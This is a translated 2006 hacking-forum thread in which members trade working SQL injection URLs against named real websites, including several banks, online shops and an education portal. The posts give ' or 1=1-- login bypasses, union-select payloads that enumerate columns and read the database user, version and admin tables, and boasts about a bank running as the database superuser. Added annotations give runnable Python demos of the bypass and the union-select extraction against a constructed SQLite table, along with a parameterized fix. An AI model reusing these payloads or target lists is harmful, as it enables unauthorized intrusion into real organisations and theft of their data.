SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    cfm is no obstacle for us :)
    canpharm.com
     
  2. guest3297

    Zloy.org
    http://zloy.org/news_n93'4.html
    Haven't been able to get it closed for a month now...
     
  3. guest3297

    BlueShop.ru
    forum.vbios.com
     
  4. guest3297

    And my pride and joy :)

     
    1 person likes this.
  5. guest3297

    Online shop
    Another one

     
    #105 guest3297, 31 Oct 2006
    Last edited: 31 Oct 2006
  6. guest3297

    http://abris.info/price/mark1.asp?id=1 or 1=@@version--
    http://abris.info/price/mark1.asp?id=1 or 1=(select db_name())--

    there's a login table there :)
     
  7. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    You've already posted this 3 times.


    23.10.2006, 01:48
     
    #107 _-[A.M.D]HiM@S-_, 31 Oct 2006
    Last edited: 31 Oct 2006
  8. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    _http://edu.ru/index.php?page_id=10&action=viewcat&cat=7' - then click on any forum and see

    _http://www.srochno.mk.ru/article.asp?id=8324'

    Let's go through the banks %)

    _http://www.rs.ru/ru/index.php?id70=320'

    _http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178'

    _http://www.trust.ru/common/promo_redirect.php?cid='13&lid=1&v=0&ul=L3J1L2luZGl2aWR1YWwvc2F2aW5ncy8=

    _http://www.nbt.tj/?c=44&id=4'4&a=263'

    _http://www.russlavbank.com/content.phtml?prcenter.newsdetail.276'

    _http://www.sdm-bank.ru/news/20044'

    _http://www.mtbank.ru/index.php?action='

    _http://www.roscredit.ru/main/newsroom/news/38'

    _http://www.forexpf.ru/forum/ - vulnerable ( 2.1.6 rst exploit )

    _http://www.paritate.ru/othernews/610301600'
     
    2 people like this.
  9. guest3297

    Guys, is there any point in posting injections here without enumerating the columns... I could post about a thousand of them.

    Just sticking in a single quote won't get you far, imho.
     
    1 person likes this.
  10. guest3297

    shop.liprom.ru
    apache+win+mssql :) brutal...

    http://shop.liprom.ru/index.php
    post
    login ' or 1=1--
    pass ' or 1=1--

    then
    http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=@@version--

    http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=(select+system_user)--

    http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945'+or+1=(select%20db_name())--

    Then

    http://shop.liprom.ru/test/
    post
    login ' or 1=1--
    pass ' or 1=1--

    And I think everyone will notice the include...
     
    1 person likes this.
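Added example (not code from the thread or from the shop's site) of what the ' or 1=1-- login bypass in the post above actually does to the query, run against an in-memory SQLite table with constructed credentials; the table layout and user names are assumptions. The first function pastes the form fields into the SQL string, which is the pattern the post is exploiting; the second sends them as bound parameters, and the same payload then simply matches nothing.

```python
import sqlite3

# Constructed demo data; the table layout and credentials are assumptions,
# not anything taken from the site discussed in the post.
USERS = [("admin", "s3cret"), ("guest", "guest")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (login TEXT, pass TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return con


def login_vulnerable(con, login, password):
    """Form fields concatenated straight into the SQL string.
    With login = "' or 1=1--" the WHERE clause becomes
        login = '' or 1=1     (everything after -- is a comment)
    so the first user row comes back and the password is never checked."""
    sql = ("SELECT login FROM users WHERE login = '" + login
           + "' AND pass = '" + password + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(con, login, password):
    """Same query with bound parameters: the quote and the -- stay inside the
    string value and are compared literally, so the payload matches no row."""
    sql = "SELECT login FROM users WHERE login = ? AND pass = ?"
    row = con.execute(sql, (login, password)).fetchone()
    return row[0] if row else None


PAYLOAD = "' or 1=1--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", login_vulnerable(db, PAYLOAD, PAYLOAD))      # admin
    print("parameterized:", login_parameterized(db, PAYLOAD, PAYLOAD))  # None
```

The bypass works because the comment marker swallows the rest of the statement, including the password check; on MSSQL the same `--` applies, on MySQL the posts use `/*` for the same purpose. Binding parameters removes the problem for every such payload at once, which is why it beats filtering quotes.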
  11. guest3297

    Another shop...
    http://megagym.ru/show_cat2.php?grid=999+union+select+concat(user(),char(58),database(),char(58),version())/*
     
  12. guest3297

    nationalbank.kz runs as sa :)
    http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178+or+1=(select+system_user)--
     
    1 person likes this.
  13. Robin_Hood

    Robin_Hood Elder

    Joined:
    30 Oct 2006
    Messages:
    144
    Likes Received:
    155
    Reputations:
    47
    http://www.oneills.ie/shop/index.asp?catID=-999+union+select+null--
     
  14. guest3297

    In Microsoft JET Database Engine, for purely technical reasons, you can't inject into a query...
     
  15. Goudini

    Goudini Elder

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Code:
    http://section3.net/moblog/big.php?img=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*&pg=1
    
    Code:
    http://www.hallmarkstudentministry.com/moblog/big.php?img=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*&pg=1
     
  16. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://quiddich.voldemort.ru/forum.php?forum=16&sid=&skey=&topic=-599+union+select+1,2,user(),4,5,6,7,8,9/*
     
  17. Goudini

    Code:
    http://www.teplo-tech.ru/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*&open=1
    Code:
    http://www.belvar.com/new/ru/production.html?id=-1+union+select+user()/*
    Code:
    http://www.meteoprog.com.ua/table.php?cityid=-1+union+select+1+from+admin/*
     
  18. BlackDog

    BlackDog Elder

    Joined:
    5 Jul 2006
    Messages:
    53
    Likes Received:
    19
    Reputations:
    -8
    http://www.raggame.ru/characters.asp?p_ind=27'

    Warned the admins - they're not patching.
     
  19. podkashey

    podkashey With a lid for life!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    http://sax777.com/?act=-2%20union%20select%201,2,concat(version(),char(32),user(),char(32),database()),4,5,6,7,8/*
    Found it when I saw this "h4xor" quest: http://hacker.sax777.com/
     
    1 person likes this.
  20. Reject

    Reject Member

    Joined:
    19 Oct 2006
    Messages:
    35
    Likes Received:
    8
    Reputations:
    17
    http://polar-bags.ru/view.php?catalog=1&mode=shop&id=999'+union+select+null/*
     
    1 person likes this.
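Added example, not code from any of the posts, generalizing the union-select payloads in posts 11, 13, 15, 16, 17, 19 and 20: `union select null,...` (or `1,2,3,...`) with a growing column count until the error goes away, `union select ... from admin` to learn whether a table exists, and a concat-style expression placed in one reflected column to read data back. It runs against a constructed in-memory SQLite database standing in for the shop backends; SQLite has `||` instead of MySQL's `concat()` and no `user()`/`database()`, so the probe reads `sqlite_version()` and a row from the constructed admin table instead, and `--` is used where the posts use `/*`. All table and column names are assumptions.

```python
import sqlite3

# Constructed demo schema; every name here is an assumption for the example.


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE goods (id INTEGER, name TEXT, price REAL, grid INTEGER)")
    con.executemany("INSERT INTO goods VALUES (?, ?, ?, ?)",
                    [(1, "dumbbell", 10.0, 5), (2, "bench", 99.0, 5)])
    con.execute("CREATE TABLE admin (login TEXT, pass TEXT)")
    con.execute("INSERT INTO admin VALUES ('root', 'hunter2')")
    return con


def show_cat(con, grid):
    """Vulnerable endpoint: a numeric parameter concatenated unquoted,
    the same shape as the show_cat2.php?grid=... URL in the thread."""
    sql = "SELECT id, name, price FROM goods WHERE grid = " + grid
    return con.execute(sql).fetchall()


def find_column_count(query, max_cols=20):
    """Append 'union select null,...' with one more column each time until the
    database stops complaining; that count is the width of the original SELECT."""
    for n in range(1, max_cols + 1):
        payload = "-1 union select " + ",".join(["null"] * n) + "--"
        try:
            query(payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def table_exists(query, ncols, table):
    """'union select null,... from <table>' errors only when the table is
    missing; this is the 'union select 1 from admin' trick from the thread."""
    payload = ("-1 union select " + ",".join(["null"] * ncols)
               + " from " + table + "--")
    try:
        query(payload)
        return True
    except sqlite3.OperationalError:
        return False


def extract(query, ncols, expr, slot=1):
    """Put an expression into one reflected column (the concat(user(), ...)
    style payload) and read it back out of the returned row."""
    cols = ["null"] * ncols
    cols[slot] = expr
    payload = "-1 union select " + ",".join(cols) + "--"
    rows = query(payload)
    return rows[0][slot]


def run_demo():
    con = make_db()

    def query(p):
        return show_cat(con, p)

    ncols = find_column_count(query)
    return {
        "columns": ncols,
        "admin_table": table_exists(query, ncols, "admin"),
        "nothere_table": table_exists(query, ncols, "nothere"),
        # SQLite stand-in for concat(version(), char(58), user())
        "version_and_user": extract(
            query, ncols, "sqlite_version() || ':' || (select login from admin)"),
        "admin_pass": extract(query, ncols, "(select pass from admin)"),
    }


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, "=", v)
```

The `-1` (or `999`) on the left side is there so the original SELECT returns nothing and the attacker-controlled row is the only one that comes back; the probe then goes into a column the page actually renders, which is why the posts try several slots before one shows up on the page.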